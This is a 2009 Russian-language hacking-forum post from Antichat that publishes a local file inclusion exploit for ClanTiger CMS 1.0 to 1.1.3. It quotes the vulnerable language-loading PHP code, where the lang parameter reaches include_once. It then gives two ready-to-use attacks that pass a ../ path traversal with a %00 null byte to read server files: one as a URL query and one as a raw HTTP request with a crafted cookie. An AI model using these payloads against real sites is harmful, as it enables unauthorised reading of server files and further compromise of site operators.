13.12.2009, 18:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
ClanTiger CMS 1.0<=1.1.3 Local File Inclusion
ClanTiger CMS
Web site : http://www.clantiger.com
Vesrion : 1.0<=1.1.3
[Local File Inclusion]
Vuln file: functions/class.language.php [str:73]
PHP код:
if(isset($_GET['lang']))
{
$selectedLanguage = $_GET['lang'];
}
else if($_COOKIE['lang'])
{
$selectedLanguage = $_COOKIE['lang'];
}
else
{
// resort to default
$selectedLanguage = $settings['language'];
}
// see whether the language exists
if(!in_array($selectedLanguage,$this->validLanguages,true))
{
$this->selectedLanguage = $this->validLanguages[$settings['language']];
}
else
{
$this->selectedLanguage = $this->validLanguages[$selectedLanguage];
}
// attempt to load in the translations file
if(!@include_once(ROOTPATH . 'language/' . strtolower($selectedLanguage) . '.php'))
Exploit #1:
Код:
http://[host]/[path]/index.php?lang=../../../../../../../[local_file]%00
Exploit #2:
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 59
Connection: Close
Cookie: lang=../../../../../../../[local_file]%00
Для успешной эксплуатации необходимо:
magic quotes = OFF
|
|
|